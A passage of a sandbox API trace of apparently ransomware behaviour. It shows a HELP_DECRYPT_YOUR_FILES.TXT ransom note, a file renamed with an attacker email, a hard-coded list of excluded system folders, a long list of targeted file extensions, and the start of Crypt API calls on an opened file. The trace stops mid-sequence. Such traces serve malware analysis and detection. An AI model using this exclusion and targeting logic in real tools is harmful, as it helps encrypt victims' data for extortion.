	[0175.486] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821c0d51, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x821c0d51, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x821e6748, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.487] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1882aa2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1882aa2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0175.487] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1882aa2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1882aa2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0175.487] FindClose (in: hFindFile=0xfb9570 | out: hFindFile=0xfb9570) returned 1
	[0175.487] FindClose (in: hFindFile=0xfb9570 | out: hFindFile=0xfb9570) returned 0
	[0175.487] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82127c7e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82127c7e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82127c7e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0175.487] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82127c7e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82127c7e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82127c7e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0175.488] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0175.488] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0175.488] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0175.488] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0175.489] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0175.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", cAlternateFileName="{F1189~1")) returned 1
	[0175.489] lstrcmpW (lpString1="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpString2="..") returned 1
	[0175.489] lstrcmpW (lpString1="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpString2=".") returned 1
	[0175.489] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0175.490] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0175.490] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{f11899f2-71ec-4621-9997-e17ae2f6eb26}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}"
	[0175.490] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}"
	[0175.490] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\"
	[0175.490] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\"
	[0175.490] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*"
	[0175.490] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0175.503] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*") returned 84
	[0175.503] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.504] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*") returned 0x54
	[0175.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.504] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="windows") returned 0x0
	[0175.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.504] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="boot") returned 0x0
	[0175.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.505] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="system volume information") returned 0x0
	[0175.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.505] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.505] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="temp") returned 0x0
	[0175.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="program files") returned 0x0
	[0175.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="appdata") returned 0x0
	[0175.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="application data") returned 0x0
	[0175.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="winnt") returned 0x0
	[0175.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="tmp") returned 0x0
	[0175.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="cache") returned 0x0
	[0175.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.508] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.508] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="webcache") returned 0x0
	[0175.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.508] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="inetcache") returned 0x0
	[0175.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.509] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="nvidia") returned 0x0
	[0175.509] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.509] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="packages") returned 0x0
	[0175.509] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.509] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="cookies") returned 0x0
	[0175.509] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.510] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpSrch="programdata") returned 0x0
	[0175.510] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0175.513] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fddd6c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0fddd6c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0fddd6c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xda6, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0175.513] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0175.513] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0175.513] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\"
	[0175.513] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"
	[0175.513] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml") returned 99
	[0175.513] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.513] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml") returned 0x63
	[0175.514] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.514] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.514] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"
	[0175.514] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml") returned 99
	[0175.514] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.515] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.515] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.515] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.515] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.516] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.516] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.517] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0xda6, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0xda6, lpOverlapped=0x0) returned 1
	[0175.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.523] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0175.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.526] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.527] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
